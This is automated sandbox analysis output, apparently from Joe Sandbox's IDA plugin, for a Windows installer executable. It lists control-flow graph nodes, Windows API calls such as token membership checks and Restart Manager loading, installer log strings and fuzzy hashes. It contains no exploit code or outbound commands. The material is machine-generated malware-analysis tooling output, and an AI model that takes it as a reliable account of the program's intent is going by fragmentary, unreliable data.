423cc5 56317->56324 56325 423c98 56317->56325 56321 423d62 56318->56321 56322 423d6b 56318->56322 56326 4240d6 56319->56326 56327 423d3b 56319->56327 56320->56328 56332 4240ae GetFocus 56320->56332 56329 423d78 56321->56329 56330 423d69 56321->56330 56419 424194 11 API calls 56322->56419 56333 423f13 SendMessageA 56323->56333 56334 423d07 56323->56334 56324->56328 56352 423cde 56324->56352 56353 423e3f 56324->56353 56335 423df6 56325->56335 56336 423c9e 56325->56336 56433 424850 WinHelpA PostMessageA 56326->56433 56338 4240ed 56327->56338 56362 423cc0 56327->56362 56328->56298 56339 4241dc 11 API calls 56329->56339 56420 423b84 NtdllDefWindowProc_A 56330->56420 56332->56328 56340 4240bf 56332->56340 56333->56328 56334->56328 56334->56362 56383 423f56 56334->56383 56424 423b84 NtdllDefWindowProc_A 56335->56424 56341 423ca7 56336->56341 56342 423e1e PostMessageA 56336->56342 56350 4240f6 56338->56350 56351 42410b 56338->56351 56339->56328 56432 41eff4 GetCurrentThreadId EnumThreadWindows 56340->56432 56347 423cb0 56341->56347 56348 423ea5 56341->56348 56425 423b84 NtdllDefWindowProc_A 56342->56425 56356 423cb9 56347->56356 56357 423dce IsIconic 56347->56357 56358 423eae 56348->56358 56359 423edf 56348->56359 56349 423e39 56349->56328 56360 4244d4 5 API calls 56350->56360 56434 42452c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 56351->56434 56352->56362 56363 423e0b 56352->56363 56416 423b84 NtdllDefWindowProc_A 56353->56416 56355 4240c6 56355->56328 56367 4240ce SetFocus 56355->56367 56356->56362 56368 423d91 56356->56368 56370 423dea 56357->56370 56371 423dde 56357->56371 56427 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 56358->56427 56417 423b84 NtdllDefWindowProc_A 56359->56417 56360->56328 56361->56328 56377 423fd7 IsWindowEnabled 56361->56377 56362->56328 56418 423b84 NtdllDefWindowProc_A 56362->56418 56365 424178 12 API calls 56363->56365 56365->56328 56366 423e45 56374 423e83 56366->56374 56375 423e61 56366->56375 56367->56328 56368->56328 56421 422c4c ShowWindow PostMessageA PostQuitMessage 56368->56421 56423 423b84 NtdllDefWindowProc_A 56370->56423 56422 423bc0 15 API calls 56371->56422 56384 423a84 6 API calls 56374->56384 56426 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 56375->56426 56376 423eb6 56386 423ec8 56376->56386 56393 41ef58 6 API calls 56376->56393 56377->56328 56387 423fe5 56377->56387 56380 423ee5 56381 423efd 56380->56381 56388 41eea4 2 API calls 56380->56388 56389 423a84 6 API calls 56381->56389 56383->56328 56391 423f78 IsWindowEnabled 56383->56391 56392 423e8b PostMessageA 56384->56392 56428 423b84 NtdllDefWindowProc_A 56386->56428 56396 423fec IsWindowVisible 56387->56396 56388->56381 56389->56328 56390 423e69 PostMessageA 56390->56328 56391->56328 56395 423f86 56391->56395 56392->56328 56393->56386 56429 412310 7 API calls 56395->56429 56396->56328 56398 423ffa GetFocus 56396->56398 56399 4181e0 56398->56399 56400 42400f SetFocus 56399->56400 56430 415240 56400->56430 56404 423a94 56403->56404 56406 423b0d 56403->56406 56405 423a9a EnumWindows 56404->56405 56404->56406 56405->56406 56407 423ab6 GetWindow GetWindowLongA 56405->56407 56435 423a1c GetWindow 56405->56435 56406->56298 56408 423ad5 56407->56408 56408->56406 56409 423b01 SetWindowPos 56408->56409 56409->56406 56409->56408 56410->56308 56411->56308 56413 423b72 56412->56413 56414 423b7d 56412->56414 56413->56414 56415 408720 7 API calls 56413->56415 56414->56313 56414->56314 56415->56414 56416->56366 56417->56380 56418->56328 56419->56328 56420->56328 56421->56328 56422->56328 56423->56328 56424->56328 56425->56349 56426->56390 56427->56376 56428->56328 56429->56328 56431 41525b SetFocus 56430->56431 56431->56328 56432->56355 56433->56349 56434->56349 56436 423a3d GetWindowLongA 56435->56436 56437 423a49 56435->56437 56436->56437 56438 4809f7 56439 480a00 56438->56439 56441 480a2b 56438->56441 56440 480a1d 56439->56440 56439->56441 56810 476c50 189 API calls 56440->56810 56442 480a6a 56441->56442 56812 47f4a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56441->56812 56443 480a8e 56442->56443 56446 480a81 56442->56446 56447 480a83 56442->56447 56452 480aca 56443->56452 56453 480aac 56443->56453 56456 47f4e8 42 API calls 56446->56456 56814 47f57c 42 API calls 56447->56814 56448 480a22 56448->56441 56811 408be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56448->56811 56449 480a5d 56813 47f50c 42 API calls 56449->56813 56817 47f33c 24 API calls 56452->56817 56457 480ac1 56453->56457 56815 47f50c 42 API calls 56453->56815 56456->56443 56816 47f33c 24 API calls 56457->56816 56460 480ac8 56461 480ada 56460->56461 56462 480ae0 56460->56462 56463 480ade 56461->56463 56467 47f4e8 42 API calls 56461->56467 56462->56463 56465 47f4e8 42 API calls 56462->56465 56564 47c66c 56463->56564 56465->56463 56467->56463 56565 42d898 GetWindowsDirectoryA 56564->56565 56566 47c690 56565->56566 56567 403450 4 API calls 56566->56567 56568 47c69d 56567->56568 56569 42d8c4 GetSystemDirectoryA 56568->56569 56570 47c6a5 56569->56570 56571 403450 4 API calls 56570->56571 56572 47c6b2 56571->56572 56573 42d8f0 6 API calls 56572->56573 56574 47c6ba 56573->56574 56575 403450 4 API calls 56574->56575 56576 47c6c7 56575->56576 56577 47c6d0 56576->56577 56578 47c6ec 56576->56578 56849 42d208 56577->56849 56580 403400 4 API calls 56578->56580 56582 47c6ea 56580->56582 56584 47c731 56582->56584 56586 42c8cc 5 API calls 56582->56586 56583 403450 4 API calls 56583->56582 56829 47c4f4 56584->56829 56588 47c70c 56586->56588 56590 403450 4 API calls 56588->56590 56589 403450 4 API calls 56591 47c74d 56589->56591 56592 47c719 56590->56592 56593 47c76b 56591->56593 56594 4035c0 4 API calls 56591->56594 56592->56584 56596 403450 4 API calls 56592->56596 56595 47c4f4 8 API calls 56593->56595 56594->56593 56597 47c77a 56595->56597 56596->56584 56598 403450 4 API calls 56597->56598 56599 47c787 56598->56599 56601 47c7af 56599->56601 56602 42c3fc 5 API calls 56599->56602 56600 47c816 56605 47c8de 56600->56605 56606 47c836 SHGetKnownFolderPath 56600->56606 56601->56600 56603 47c4f4 8 API calls 56601->56603 56604 47c79d 56602->56604 56607 47c7c7 56603->56607 56610 4035c0 4 API calls 56604->56610 56608 47c8e7 56605->56608 56609 47c908 56605->56609 56611 47c850 56606->56611 56612 47c88b SHGetKnownFolderPath 56606->56612 56613 403450 4 API calls 56607->56613 56610->56601 56612->56605 56810->56448 56812->56449 56813->56442 56814->56443 56815->56457 56816->56460 56817->56460 56830 42de1c RegOpenKeyExA 56829->56830 56831 47c51a 56830->56831 56832 47c540 56831->56832 56833 47c51e 56831->56833 56834 403400 4 API calls 56832->56834 56835 42dd4c 6 API calls 56833->56835 56836 47c547 56834->56836 56837 47c52a 56835->56837 56836->56589 56838 47c535 RegCloseKey 56837->56838 56839 403400 4 API calls 56837->56839 56838->56836 56839->56838 56850 4038a4 4 API calls 56849->56850 56851 42d21b 56850->56851 56852 42d232 GetEnvironmentVariableA 56851->56852 56856 42d245 56851->56856 56861 42dbd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56851->56861 56852->56851 56853 42d23e 56852->56853 56855 403400 4 API calls 56853->56855 56855->56856 56856->56583 56861->56851
                                                                                                                                        Strings
                                                                                                                                        • Time stamp of our file: %s, xrefs: 0047099B
                                                                                                                                        • Same version. Skipping., xrefs: 00470CE5
                                                                                                                                        • Uninstaller requires administrator: %s, xrefs: 0047118F
                                                                                                                                        • Skipping due to "onlyifdestfileexists" flag., xrefs: 00470EFA
                                                                                                                                        • Time stamp of existing file: %s, xrefs: 00470A2B
                                                                                                                                        • Dest file exists., xrefs: 004709BB
                                                                                                                                        • Version of existing file: %u.%u.%u.%u, xrefs: 00470B7C
                                                                                                                                        • Version of our file: (none), xrefs: 00470AFC
                                                                                                                                        • Installing into GAC, xrefs: 00471714
                                                                                                                                        • @, xrefs: 004707B0
                                                                                                                                        • .tmp, xrefs: 00470FB7
                                                                                                                                        • Existing file has a later time stamp. Skipping., xrefs: 00470DCF
                                                                                                                                        • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470CC4
                                                                                                                                        • -- File entry --, xrefs: 004706FB
                                                                                                                                        • Version of existing file: (none), xrefs: 00470CFA
                                                                                                                                        • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 00470E96
                                                                                                                                        • InUn, xrefs: 0047115F
                                                                                                                                        • Same time stamp. Skipping., xrefs: 00470D55
                                                                                                                                        • Time stamp of existing file: (failed to read), xrefs: 00470A37
                                                                                                                                        • , xrefs: 00470BCF, 00470DA0, 00470E1E
                                                                                                                                        • User opted not to overwrite the existing file. Skipping., xrefs: 00470E4D
                                                                                                                                        • Failed to strip read-only attribute., xrefs: 00470ED3
                                                                                                                                        • Dest filename: %s, xrefs: 00470894
                                                                                                                                        • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470CB5
                                                                                                                                        • Version of our file: %u.%u.%u.%u, xrefs: 00470AF0
                                                                                                                                        • Existing file is protected by Windows File Protection. Skipping., xrefs: 00470DEC
                                                                                                                                        • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470CD0
                                                                                                                                        • Dest file is protected by Windows File Protection., xrefs: 004708ED
                                                                                                                                        • Non-default bitness: 32-bit, xrefs: 004708BB
                                                                                                                                        • Skipping due to "onlyifdoesntexist" flag., xrefs: 004709CE
                                                                                                                                        • n}, xrefs: 00470746
                                                                                                                                        • Non-default bitness: 64-bit, xrefs: 004708AF
                                                                                                                                        • Couldn't read time stamp. Skipping., xrefs: 00470D35
                                                                                                                                        • Time stamp of our file: (failed to read), xrefs: 004709A7
                                                                                                                                        • Will register the file (a type library) later., xrefs: 00471513
                                                                                                                                        • Installing the file., xrefs: 00470F09
                                                                                                                                        • Incrementing shared file count (32-bit)., xrefs: 004715A5
                                                                                                                                        • Incrementing shared file count (64-bit)., xrefs: 0047158C
                                                                                                                                        • Will register the file (a DLL/OCX) later., xrefs: 0047151F
                                                                                                                                        • Existing file is a newer version. Skipping., xrefs: 00470C02
                                                                                                                                        • Stripped read-only attribute., xrefs: 00470EC7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: n}$$-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                                                                                        • API String ID: 0-610167065
                                                                                                                                        • Opcode ID: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                                                                                                        • Instruction ID: 04e5041402f80353ef90c659d92e8d378e84d4fed116f8838aecbbc27e5febe3
                                                                                                                                        • Opcode Fuzzy Hash: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                                                                                                        • Instruction Fuzzy Hash: 31927574A0424CDFDB21DFA9C445BDDBBB5AF05304F1480ABE848A7392D7789E49CB19

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1578 42e09c-42e0ad 1579 42e0b8-42e0dd AllocateAndInitializeSid 1578->1579 1580 42e0af-42e0b3 1578->1580 1581 42e287-42e28f 1579->1581 1582 42e0e3-42e100 GetVersion 1579->1582 1580->1581 1583 42e102-42e117 GetModuleHandleA GetProcAddress 1582->1583 1584 42e119-42e11b 1582->1584 1583->1584 1585 42e142-42e15c GetCurrentThread OpenThreadToken 1584->1585 1586 42e11d-42e12b CheckTokenMembership 1584->1586 1589 42e193-42e1bb GetTokenInformation 1585->1589 1590 42e15e-42e168 GetLastError 1585->1590 1587 42e131-42e13d 1586->1587 1588 42e269-42e27f FreeSid 1586->1588 1587->1588 1591 42e1d6-42e1fa call 402648 GetTokenInformation 1589->1591 1592 42e1bd-42e1c5 GetLastError 1589->1592 1593 42e174-42e187 GetCurrentProcess OpenProcessToken 1590->1593 1594 42e16a-42e16f call 4031bc 1590->1594 1605 42e208-42e210 1591->1605 1606 42e1fc-42e206 call 4031bc * 2 1591->1606 1592->1591 1595 42e1c7-42e1d1 call 4031bc * 2 1592->1595 1593->1589 1598 42e189-42e18e call 4031bc 1593->1598 1594->1581 1595->1581 1598->1581 1607 42e212-42e213 1605->1607 1608 42e243-42e261 call 402660 CloseHandle 1605->1608 1606->1581 1611 42e215-42e228 EqualSid 1607->1611 1615 42e22a-42e237 1611->1615 1616 42e23f-42e241 1611->1616 1615->1616 1619 42e239-42e23d 1615->1619 1616->1608 1616->1611 1619->1608
                                                                                                                                        APIs
                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0D6
                                                                                                                                        • GetVersion.KERNEL32(00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0F3
                                                                                                                                        • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E10C
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E112
                                                                                                                                        • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E127
                                                                                                                                        • FreeSid.ADVAPI32(00000000,0042E287,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E27A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                                                                        • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                        • API String ID: 2252812187-1888249752
                                                                                                                                        • Opcode ID: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                                                                        • Instruction ID: e5677345bf142a8b1d9111380f95962c8bb8cf61ba8e960ca5c3fd0f127139eb
                                                                                                                                        • Opcode Fuzzy Hash: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                                                                        • Instruction Fuzzy Hash: E351A271B44215EEEB10EAE69C42BBF77ACEB09704F9404BBB901F7281D57C99018B79

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1642 4502c0-4502cd 1643 4502d3-4502e0 GetVersion 1642->1643 1644 45037c-450386 1642->1644 1643->1644 1645 4502e6-4502fc LoadLibraryA 1643->1645 1645->1644 1646 4502fe-450377 GetProcAddress * 6 1645->1646 1646->1644
                                                                                                                                        APIs
                                                                                                                                        • GetVersion.KERNEL32(00480B52), ref: 004502D3
                                                                                                                                        • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480B52), ref: 004502EB
                                                                                                                                        • GetProcAddress.KERNEL32(6EE70000,RmStartSession), ref: 00450309
                                                                                                                                        • GetProcAddress.KERNEL32(6EE70000,RmRegisterResources), ref: 0045031E
                                                                                                                                        • GetProcAddress.KERNEL32(6EE70000,RmGetList), ref: 00450333
                                                                                                                                        • GetProcAddress.KERNEL32(6EE70000,RmShutdown), ref: 00450348
                                                                                                                                        • GetProcAddress.KERNEL32(6EE70000,RmRestart), ref: 0045035D
                                                                                                                                        • GetProcAddress.KERNEL32(6EE70000,RmEndSession), ref: 00450372
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$LibraryLoadVersion
                                                                                                                                        • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                                                                                        • API String ID: 1968650500-3419246398
                                                                                                                                        • Opcode ID: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                                                                        • Instruction ID: c77cef2ad5653e61b65a4477cbb73d0d56cf7b8a9d174f96be3e9b6947252677
                                                                                                                                        • Opcode Fuzzy Hash: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                                                                        • Instruction Fuzzy Hash: B211F7B4510301DBD710FB61BF45A2E36E9E728315B08063FE804961A2CB7C4844CF8C

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1790 423c0c-423c40 1791 423c42-423c43 1790->1791 1792 423c74-423c8b call 423b68 1790->1792 1793 423c45-423c61 call 40b24c 1791->1793 1798 423cec-423cf1 1792->1798 1799 423c8d 1792->1799 1819 423c63-423c6b 1793->1819 1820 423c70-423c72 1793->1820 1800 423cf3 1798->1800 1801 423d27-423d2c 1798->1801 1802 423c93-423c96 1799->1802 1803 423d50-423d60 1799->1803 1809 423fb1-423fb9 1800->1809 1810 423cf9-423d01 1800->1810 1804 423d32-423d35 1801->1804 1805 42409a-4240a8 IsIconic 1801->1805 1811 423cc5-423cc8 1802->1811 1812 423c98 1802->1812 1807 423d62-423d67 1803->1807 1808 423d6b-423d73 call 424194 1803->1808 1813 4240d6-4240eb call 424850 1804->1813 1814 423d3b-423d3c 1804->1814 1815 424152-42415a 1805->1815 1824 4240ae-4240b9 GetFocus 1805->1824 1821 423d78-423d80 call 4241dc 1807->1821 1822 423d69-423d8c call 423b84 1807->1822 1808->1815 1809->1815 1816 423fbf-423fca call 4181e0 1809->1816 1825 423f13-423f3a SendMessageA 1810->1825 1826 423d07-423d0c 1810->1826 1817 423da9-423db0 1811->1817 1818 423cce-423ccf 1811->1818 1827 423df6-423e06 call 423b84 1812->1827 1828 423c9e-423ca1 1812->1828 1813->1815 1831 423d42-423d45 1814->1831 1832 4240ed-4240f4 1814->1832 1829 424171-424177 1815->1829 1816->1815 1878 423fd0-423fdf call 4181e0 IsWindowEnabled 1816->1878 1817->1815 1841 423db6-423dbd 1817->1841 1842 423cd5-423cd8 1818->1842 1843 423f3f-423f46 1818->1843 1819->1829 1820->1792 1820->1793 1821->1815 1822->1815 1824->1815 1836 4240bf-4240c8 call 41eff4 1824->1836 1825->1815 1844 423d12-423d13 1826->1844 1845 42404a-424055 1826->1845 1827->1815 1837 423ca7-423caa 1828->1837 1838 423e1e-423e3a PostMessageA call 423b84 1828->1838 1847 424120-424127 1831->1847 1848 423d4b 1831->1848 1858 4240f6-424109 call 4244d4 1832->1858 1859 42410b-42411e call 42452c 1832->1859 1836->1815 1891 4240ce-4240d4 SetFocus 1836->1891 1855 423cb0-423cb3 1837->1855 1856 423ea5-423eac 1837->1856 1838->1815 1841->1815 1861 423dc3-423dc9 1841->1861 1862 423cde-423ce1 1842->1862 1863 423e3f-423e5f call 423b84 1842->1863 1843->1815 1851 423f4c-423f51 call 404e54 1843->1851 1864 424072-42407d 1844->1864 1865 423d19-423d1c 1844->1865 1845->1815 1849 42405b-42406d 1845->1849 1882 42413a-424149 1847->1882 1883 424129-424138 1847->1883 1866 42414b-42414c call 423b84 1848->1866 1849->1815 1851->1815 1873 423cb9-423cba 1855->1873 1874 423dce-423ddc IsIconic 1855->1874 1875 423eae-423ec1 call 423b14 1856->1875 1876 423edf-423ef0 call 423b84 1856->1876 1858->1815 1859->1815 1861->1815 1879 423ce7 1862->1879 1880 423e0b-423e19 call 424178 1862->1880 1906 423e83-423ea0 call 423a84 PostMessageA 1863->1906 1907 423e61-423e7e call 423b14 PostMessageA 1863->1907 1864->1815 1867 424083-424095 1864->1867 1884 423d22 1865->1884 1885 423f56-423f5e 1865->1885 1903 424151 1866->1903 1867->1815 1892 423cc0 1873->1892 1893 423d91-423d99 1873->1893 1899 423dea-423df1 call 423b84 1874->1899 1900 423dde-423de5 call 423bc0 1874->1900 1922 423ed3-423eda call 423b84 1875->1922 1923 423ec3-423ecd call 41ef58 1875->1923 1916 423ef2-423ef8 call 41eea4 1876->1916 1917 423f06-423f0e call 423a84 1876->1917 1878->1815 1924 423fe5-423ff4 call 4181e0 IsWindowVisible 1878->1924 1879->1866 1880->1815 1882->1815 1883->1815 1884->1866 1885->1815 1890 423f64-423f6b 1885->1890 1890->1815 1908 423f71-423f80 call 4181e0 IsWindowEnabled 1890->1908 1891->1815 1892->1866 1893->1815 1909 423d9f-423da4 call 422c4c 1893->1909 1899->1815 1900->1815 1903->1815 1906->1815 1907->1815 1908->1815 1937 423f86-423f9c call 412310 1908->1937 1909->1815 1935 423efd-423f00 1916->1935 1917->1815 1922->1815 1923->1922 1924->1815 1942 423ffa-424045 GetFocus call 4181e0 SetFocus call 415240 SetFocus 1924->1942 1935->1917 1937->1815 1946 423fa2-423fac 1937->1946 1942->1815 1946->1815
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                                                                        • Instruction ID: afb4f91cf4018cf9acc1c9974f14325182323c15c0e0405bd0f9b005e596376e
                                                                                                                                        • Opcode Fuzzy Hash: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                                                                        • Instruction Fuzzy Hash: 03E1AE31700124EFDB04DF69E989AADB7B5FB54300FA440AAE5559B352C73CEE81DB09

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 2133 4673a4-4673ba 2134 4673c4-46747b call 49577c call 402b30 * 6 2133->2134 2135 4673bc-4673bf call 402d30 2133->2135 2152 46747d-4674a4 call 41463c 2134->2152 2153 4674b8-4674d1 2134->2153 2135->2134 2157 4674a6 2152->2157 2158 4674a9-4674b3 call 4145fc 2152->2158 2159 4674d3-4674fa call 41461c 2153->2159 2160 46750e-46751c call 495a84 2153->2160 2157->2158 2158->2153 2166 4674ff-467509 call 4145dc 2159->2166 2167 4674fc 2159->2167 2168 46751e-46752d call 4958cc 2160->2168 2169 46752f-467531 call 4959f0 2160->2169 2166->2160 2167->2166 2174 467536-467589 call 4953e0 call 41a3d0 * 2 2168->2174 2169->2174 2181 46759a-4675af call 451458 call 414b18 2174->2181 2182 46758b-467598 call 414b18 2174->2182 2187 4675b4-4675bb 2181->2187 2182->2187 2189 467603-467a89 call 49581c call 495b40 call 41461c * 3 call 4146bc call 4145dc * 3 call 460bfc call 460c14 call 460c20 call 460c68 call 460bfc call 460c14 call 460c20 call 460c68 call 460c14 call 460c68 LoadBitmapA call 41d6b0 call 460c38 call 460c50 call 467180 call 468c94 call 466800 call 40357c call 414b18 call 466b38 call 466b40 call 466800 call 40357c * 2 call 414b18 call 468c94 call 466800 call 414b18 call 466b38 call 466b40 call 414b18 * 2 call 468c94 call 414b18 * 2 call 466b38 call 4145fc call 466b38 call 4145fc call 468c94 call 414b18 call 466b38 call 466b40 call 468c94 call 414b18 call 466b38 call 4145fc * 2 call 414b18 call 466b38 call 4145fc 2187->2189 2190 4675bd-4675fe call 4146bc call 414700 call 420f98 call 420fc4 call 420b68 call 420b94 2187->2190 2320 467ae5-467afe call 414a44 * 2 2189->2320 2321 467a8b-467ae3 call 4145fc call 414b18 call 466b38 call 4145fc 2189->2321 2190->2189 2329 467b03-467bb4 call 466800 call 468c94 call 466800 call 414b18 call 495b40 call 466b38 2320->2329 2321->2329 2347 467bb6-467bd1 2329->2347 2348 467bee-467e24 call 466800 call 414b18 call 495b50 * 2 call 42e8c0 call 4145fc call 466b38 call 4145fc call 4181e0 call 42ed38 call 414b18 call 49581c call 495b40 call 41461c call 466800 call 414b18 call 466b38 call 4145fc call 466800 call 468c94 call 466800 call 414b18 call 466b38 call 4145fc call 466b40 call 466800 call 414b18 call 466b38 2329->2348 2349 467bd6-467be9 call 4145fc 2347->2349 2350 467bd3 2347->2350 2409 467e26-467e2f 2348->2409 2410 467e65-467f1e call 466800 call 468c94 call 466800 call 414b18 call 495b40 call 466b38 2348->2410 2349->2348 2350->2349 2409->2410 2411 467e31-467e60 call 414a44 call 466b40 2409->2411 2428 467f20-467f3b 2410->2428 2429 467f58-468379 call 466800 call 414b18 call 495b50 * 2 call 42e8c0 call 4145fc call 466b38 call 4145fc call 414b18 call 49581c call 495b40 call 41461c call 414b18 call 466800 call 468c94 call 466800 call 414b18 call 466b38 call 466b40 call 42bbd0 call 495b50 call 44e8b0 call 466800 call 468c94 call 466800 call 468c94 call 466800 call 468c94 * 2 call 414b18 call 466b38 call 466b40 call 468c94 call 4953e0 call 41a3d0 call 466800 call 40357c call 414b18 call 466b38 call 4145fc call 414b18 * 2 call 495b50 call 403494 call 40357c * 2 call 414b18 2410->2429 2411->2410 2431 467f40-467f53 call 4145fc 2428->2431 2432 467f3d 2428->2432 2528 46839d-4683a4 2429->2528 2529 46837b-468398 call 44ffdc call 450138 2429->2529 2431->2429 2432->2431 2531 4683a6-4683c3 call 44ffdc call 450138 2528->2531 2532 4683c8-4683cf 